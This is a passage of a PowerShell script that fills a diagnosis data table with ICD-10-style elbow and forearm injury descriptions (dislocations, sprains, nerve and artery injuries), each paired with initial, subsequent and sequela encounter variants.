joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Medial subluxation of left ulnohumeral joint","Medial subluxation of left ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Medial subluxation of left ulnohumeral joint","Medial subluxation of left ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Medial subluxation of unspecified ulnohumeral joint","Medial subluxation of unspecified ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Medial subluxation of unspecified ulnohumeral joint","Medial subluxation of unspecified ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Medial subluxation of unspecified ulnohumeral joint","Medial subluxation of unspecified ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Medial dislocation of right ulnohumeral joint","Medial dislocation of right ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Medial dislocation of right ulnohumeral joint","Medial dislocation of right ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Medial dislocation of right ulnohumeral joint","Medial dislocation of right ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Medial dislocation of left ulnohumeral joint","Medial dislocation of left ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Medial dislocation of left ulnohumeral joint","Medial dislocation of left ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Medial dislocation of left ulnohumeral joint","Medial dislocation of left ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Medial dislocation of unspecified ulnohumeral joint","Medial dislocation of unspecified ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Medial dislocation of unspecified ulnohumeral joint","Medial dislocation of unspecified ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Medial dislocation of unspecified ulnohumeral joint","Medial dislocation of unspecified ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Lateral subluxation of right ulnohumeral joint","Lateral subluxation of right ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Lateral subluxation of right ulnohumeral joint","Lateral subluxation of right ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Lateral subluxation of right ulnohumeral joint","Lateral subluxation of right ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Lateral subluxation of left ulnohumeral joint","Lateral subluxation of left ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Lateral subluxation of left ulnohumeral joint","Lateral subluxation of left ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Lateral subluxation of left ulnohumeral joint","Lateral subluxation of left ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Lateral subluxation of unspecified ulnohumeral joint","Lateral subluxation of unspecified ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Lateral subluxation of unspecified ulnohumeral joint","Lateral subluxation of unspecified ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Lateral subluxation of unspecified ulnohumeral joint","Lateral subluxation of unspecified ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Lateral dislocation of right ulnohumeral joint","Lateral dislocation of right ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Lateral dislocation of right ulnohumeral joint","Lateral dislocation of right ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Lateral dislocation of right ulnohumeral joint","Lateral dislocation of right ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Lateral dislocation of left ulnohumeral joint","Lateral dislocation of left ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Lateral dislocation of left ulnohumeral joint","Lateral dislocation of left ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Lateral dislocation of left ulnohumeral joint","Lateral dislocation of left ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Lateral dislocation of unspecified ulnohumeral joint","Lateral dislocation of unspecified ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Lateral dislocation of unspecified ulnohumeral joint","Lateral dislocation of unspecified ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Lateral dislocation of unspecified ulnohumeral joint","Lateral dislocation of unspecified ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Other subluxation of right ulnohumeral joint","Other subluxation of right ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of right ulnohumeral joint","Other subluxation of right ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of right ulnohumeral joint","Other subluxation of right ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Other subluxation of left ulnohumeral joint","Other subluxation of left ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of left ulnohumeral joint","Other subluxation of left ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of left ulnohumeral joint","Other subluxation of left ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Other subluxation of unspecified ulnohumeral joint","Other subluxation of unspecified ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of unspecified ulnohumeral joint","Other subluxation of unspecified ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of unspecified ulnohumeral joint","Other subluxation of unspecified ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Other dislocation of right ulnohumeral joint","Other dislocation of right ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of right ulnohumeral joint","Other dislocation of right ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of right ulnohumeral joint","Other dislocation of right ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Other dislocation of left ulnohumeral joint","Other dislocation of left ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of left ulnohumeral joint","Other dislocation of left ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of left ulnohumeral joint","Other dislocation of left ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Other dislocation of unspecified ulnohumeral joint","Other dislocation of unspecified ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of unspecified ulnohumeral joint","Other dislocation of unspecified ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of unspecified ulnohumeral joint","Other dislocation of unspecified ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified radial collateral ligament","Traumatic rupture of unspecified radial collateral ligament, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified radial collateral ligament","Traumatic rupture of unspecified radial collateral ligament, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified radial collateral ligament","Traumatic rupture of unspecified radial collateral ligament, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of right radial collateral ligament","Traumatic rupture of right radial collateral ligament, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of right radial collateral ligament","Traumatic rupture of right radial collateral ligament, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of right radial collateral ligament","Traumatic rupture of right radial collateral ligament, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of left radial collateral ligament","Traumatic rupture of left radial collateral ligament, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of left radial collateral ligament","Traumatic rupture of left radial collateral ligament, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of left radial collateral ligament","Traumatic rupture of left radial collateral ligament, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ulnar collateral ligament","Traumatic rupture of unspecified ulnar collateral ligament, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ulnar collateral ligament","Traumatic rupture of unspecified ulnar collateral ligament, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ulnar collateral ligament","Traumatic rupture of unspecified ulnar collateral ligament, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of right ulnar collateral ligament","Traumatic rupture of right ulnar collateral ligament, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of right ulnar collateral ligament","Traumatic rupture of right ulnar collateral ligament, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of right ulnar collateral ligament","Traumatic rupture of right ulnar collateral ligament, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of left ulnar collateral ligament","Traumatic rupture of left ulnar collateral ligament, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of left ulnar collateral ligament","Traumatic rupture of left ulnar collateral ligament, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of left ulnar collateral ligament","Traumatic rupture of left ulnar collateral ligament, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right elbow","Unspecified sprain of right elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right elbow","Unspecified sprain of right elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right elbow","Unspecified sprain of right elbow, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left elbow","Unspecified sprain of left elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left elbow","Unspecified sprain of left elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left elbow","Unspecified sprain of left elbow, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of unspecified elbow","Unspecified sprain of unspecified elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of unspecified elbow","Unspecified sprain of unspecified elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of unspecified elbow","Unspecified sprain of unspecified elbow, sequela") + $null = $DiagnosisList.Rows.Add("Radiohumeral (joint) sprain of right elbow","Radiohumeral (joint) sprain of right elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Radiohumeral (joint) sprain of right elbow","Radiohumeral (joint) sprain of right elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Radiohumeral (joint) sprain of right elbow","Radiohumeral (joint) sprain of right elbow, sequela") + $null = $DiagnosisList.Rows.Add("Radiohumeral (joint) sprain of left elbow","Radiohumeral (joint) sprain of left elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Radiohumeral (joint) sprain of left elbow","Radiohumeral (joint) sprain of left elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Radiohumeral (joint) sprain of left elbow","Radiohumeral (joint) sprain of left elbow, sequela") + $null = $DiagnosisList.Rows.Add("Radiohumeral (joint) sprain of unspecified elbow","Radiohumeral (joint) sprain of unspecified elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Radiohumeral (joint) sprain of unspecified elbow","Radiohumeral (joint) sprain of unspecified elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Radiohumeral (joint) sprain of unspecified elbow","Radiohumeral (joint) sprain of unspecified elbow, sequela") + $null = $DiagnosisList.Rows.Add("Ulnohumeral (joint) sprain of right elbow","Ulnohumeral (joint) sprain of right elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Ulnohumeral (joint) sprain of right elbow","Ulnohumeral (joint) sprain of right elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Ulnohumeral (joint) sprain of right elbow","Ulnohumeral (joint) sprain of right elbow, sequela") + $null = $DiagnosisList.Rows.Add("Ulnohumeral (joint) sprain of left elbow","Ulnohumeral (joint) sprain of left elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Ulnohumeral (joint) sprain of left elbow","Ulnohumeral (joint) sprain of left elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Ulnohumeral (joint) sprain of left elbow","Ulnohumeral (joint) sprain of left elbow, sequela") + $null = $DiagnosisList.Rows.Add("Ulnohumeral (joint) sprain of unspecified elbow","Ulnohumeral (joint) sprain of unspecified elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Ulnohumeral (joint) sprain of unspecified elbow","Ulnohumeral (joint) sprain of unspecified elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Ulnohumeral (joint) sprain of unspecified elbow","Ulnohumeral (joint) sprain of unspecified elbow, sequela") + $null = $DiagnosisList.Rows.Add("Radial collateral ligament sprain of right elbow","Radial collateral ligament sprain of right elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Radial collateral ligament sprain of right elbow","Radial collateral ligament sprain of right elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Radial collateral ligament sprain of right elbow","Radial collateral ligament sprain of right elbow, sequela") + $null = $DiagnosisList.Rows.Add("Radial collateral ligament sprain of left elbow","Radial collateral ligament sprain of left elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Radial collateral ligament sprain of left elbow","Radial collateral ligament sprain of left elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Radial collateral ligament sprain of left elbow","Radial collateral ligament sprain of left elbow, sequela") + $null = $DiagnosisList.Rows.Add("Radial collateral ligament sprain of unspecified elbow","Radial collateral ligament sprain of unspecified elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Radial collateral ligament sprain of unspecified elbow","Radial collateral ligament sprain of unspecified elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Radial collateral ligament sprain of unspecified elbow","Radial collateral ligament sprain of unspecified elbow, sequela") + $null = $DiagnosisList.Rows.Add("Ulnar collateral ligament sprain of right elbow","Ulnar collateral ligament sprain of right elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Ulnar collateral ligament sprain of right elbow","Ulnar collateral ligament sprain of right elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Ulnar collateral ligament sprain of right elbow","Ulnar collateral ligament sprain of right elbow, sequela") + $null = $DiagnosisList.Rows.Add("Ulnar collateral ligament sprain of left elbow","Ulnar collateral ligament sprain of left elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Ulnar collateral ligament sprain of left elbow","Ulnar collateral ligament sprain of left elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Ulnar collateral ligament sprain of left elbow","Ulnar collateral ligament sprain of left elbow, sequela") + $null = $DiagnosisList.Rows.Add("Ulnar collateral ligament sprain of unspecified elbow","Ulnar collateral ligament sprain of unspecified elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Ulnar collateral ligament sprain of unspecified elbow","Ulnar collateral ligament sprain of unspecified elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Ulnar collateral ligament sprain of unspecified elbow","Ulnar collateral ligament sprain of unspecified elbow, sequela") + $null = $DiagnosisList.Rows.Add("Other sprain of right elbow","Other sprain of right elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of right elbow","Other sprain of right elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of right elbow","Other sprain of right elbow, sequela") + $null = $DiagnosisList.Rows.Add("Other sprain of left elbow","Other sprain of left elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of left elbow","Other sprain of left elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of left elbow","Other sprain of left elbow, sequela") + $null = $DiagnosisList.Rows.Add("Other sprain of unspecified elbow","Other sprain of unspecified elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of unspecified elbow","Other sprain of unspecified elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of unspecified elbow","Other sprain of unspecified elbow, sequela") + $null = $DiagnosisList.Rows.Add("Injury of ulnar nerve at forearm level, unspecified arm","Injury of ulnar nerve at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of ulnar nerve at forearm level, unspecified arm","Injury of ulnar nerve at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of ulnar nerve at forearm level, unspecified arm","Injury of ulnar nerve at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of ulnar nerve at forearm level, right arm","Injury of ulnar nerve at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of ulnar nerve at forearm level, right arm","Injury of ulnar nerve at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of ulnar nerve at forearm level, right arm","Injury of ulnar nerve at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of ulnar nerve at forearm level, left arm","Injury of ulnar nerve at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of ulnar nerve at forearm level, left arm","Injury of ulnar nerve at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of ulnar nerve at forearm level, left arm","Injury of ulnar nerve at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of median nerve at forearm level, unspecified arm","Injury of median nerve at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of median nerve at forearm level, unspecified arm","Injury of median nerve at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of median nerve at forearm level, unspecified arm","Injury of median nerve at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of median nerve at forearm level, right arm","Injury of median nerve at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of median nerve at forearm level, right arm","Injury of median nerve at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of median nerve at forearm level, right arm","Injury of median nerve at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of median nerve at forearm level, left arm","Injury of median nerve at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of median nerve at forearm level, left arm","Injury of median nerve at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of median nerve at forearm level, left arm","Injury of median nerve at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of radial nerve at forearm level, unspecified arm","Injury of radial nerve at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of radial nerve at forearm level, unspecified arm","Injury of radial nerve at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of radial nerve at forearm level, unspecified arm","Injury of radial nerve at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of radial nerve at forearm level, right arm","Injury of radial nerve at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of radial nerve at forearm level, right arm","Injury of radial nerve at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of radial nerve at forearm level, right arm","Injury of radial nerve at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of radial nerve at forearm level, left arm","Injury of radial nerve at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of radial nerve at forearm level, left arm","Injury of radial nerve at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of radial nerve at forearm level, left arm","Injury of radial nerve at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at forearm level, unspecified arm","Injury of cutaneous sensory nerve at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at forearm level, unspecified arm","Injury of cutaneous sensory nerve at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at forearm level, unspecified arm","Injury of cutaneous sensory nerve at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at forearm level, right arm","Injury of cutaneous sensory nerve at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at forearm level, right arm","Injury of cutaneous sensory nerve at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at forearm level, right arm","Injury of cutaneous sensory nerve at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at forearm level, left arm","Injury of cutaneous sensory nerve at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at forearm level, left arm","Injury of cutaneous sensory nerve at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at forearm level, left arm","Injury of cutaneous sensory nerve at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at forearm level, right arm","Injury of other nerves at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at forearm level, right arm","Injury of other nerves at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at forearm level, right arm","Injury of other nerves at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at forearm level, left arm","Injury of other nerves at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at forearm level, left arm","Injury of other nerves at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at forearm level, left arm","Injury of other nerves at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at forearm level, unspecified arm","Injury of other nerves at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at forearm level, unspecified arm","Injury of other nerves at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at forearm level, unspecified arm","Injury of other nerves at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at forearm level, unspecified arm","Injury of unspecified nerve at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at forearm level, unspecified arm","Injury of unspecified nerve at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at forearm level, unspecified arm","Injury of unspecified nerve at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at forearm level, right arm","Injury of unspecified nerve at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at forearm level, right arm","Injury of unspecified nerve at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at forearm level, right arm","Injury of unspecified nerve at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at forearm level, left arm","Injury of unspecified nerve at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at forearm level, left arm","Injury of unspecified nerve at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at forearm level, left arm","Injury of unspecified nerve at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ulnar artery at forearm level, right arm","Unspecified injury of ulnar artery at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ulnar artery at forearm level, right arm","Unspecified injury of ulnar artery at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ulnar artery at forearm level, right arm","Unspecified injury of ulnar artery at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ulnar artery at forearm level, left arm","Unspecified injury of ulnar artery at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ulnar artery at forearm level, left arm","Unspecified injury of ulnar artery at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ulnar artery at forearm level, left arm","Unspecified injury of ulnar artery at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ulnar artery at forearm level, unspecified arm","Unspecified injury of ulnar artery at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ulnar artery at forearm level, unspecified arm","Unspecified injury of ulnar artery at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ulnar artery at forearm level, unspecified arm","Unspecified injury of ulnar artery at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of ulnar artery at forearm level, right arm","Laceration of ulnar artery at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of ulnar artery at forearm level, right arm","Laceration of ulnar artery at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of ulnar artery at forearm level, right arm","Laceration of ulnar artery at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of ulnar artery at forearm level, left arm","Laceration of ulnar artery at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of ulnar artery at forearm level, left arm","Laceration of ulnar artery at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of ulnar artery at forearm level, left arm","Laceration of ulnar artery at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of ulnar artery at forearm level, unspecified arm","Laceration of ulnar artery at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of ulnar artery at forearm level, unspecified arm","Laceration of ulnar artery at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of ulnar artery at forearm level, unspecified arm","Laceration of ulnar artery at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of ulnar artery at forearm level, right arm","Other specified injury of ulnar artery at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of ulnar artery at forearm level, right arm","Other specified injury of ulnar artery at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of ulnar artery at forearm level, right arm","Other specified injury of ulnar artery at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of ulnar artery at forearm level, left arm","Other specified injury of ulnar artery at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of ulnar artery at forearm level, left arm","Other specified injury of ulnar artery at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of ulnar artery at forearm level, left arm","Other specified injury of ulnar artery at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of ulnar artery at forearm level, unspecified arm","Other specified injury of ulnar artery at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of ulnar artery at forearm level, unspecified arm","Other specified injury of ulnar artery at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of ulnar artery at forearm level, unspecified arm","Other specified injury of ulnar artery at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of radial artery at forearm level, right arm","Unspecified injury of radial artery at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of radial artery at forearm level, right arm","Unspecified injury of radial artery at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of radial artery at forearm level, right arm","Unspecified injury of radial artery at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of radial artery at forearm level, left arm","Unspecified injury of radial artery at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of radial artery at forearm level, left arm","Unspecified injury of radial artery at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of radial artery at forearm level, left arm","Unspecified injury of radial artery at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of radial artery at forearm level, unspecified arm","Unspecified injury of radial artery at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of radial artery at forearm level, unspecified arm","Unspecified injury of radial artery at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of radial artery at forearm level, unspecified arm","Unspecified injury of radial artery at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of radial artery at forearm level, right arm","Laceration of radial artery at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of radial artery at forearm level, right arm","Laceration of radial artery at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of radial artery at forearm level, right arm","Laceration of radial artery at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of radial artery at forearm level, left arm","Laceration of radial artery at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of radial artery at forearm level, left arm","Laceration of radial artery at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of radial artery at forearm level, left arm","Laceration of radial artery at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of radial artery at forearm level, unspecified arm","Laceration of radial artery at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of radial artery at forearm level, unspecified arm","Laceration of radial artery at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of radial artery at forearm level, unspecified arm","Laceration of radial artery at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of radial artery at forearm level, right arm","Other specified injury of radial artery at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of radial artery at forearm level, right arm","Other specified injury of radial artery at forearm level, right arm, subsequent encounter") + $null = 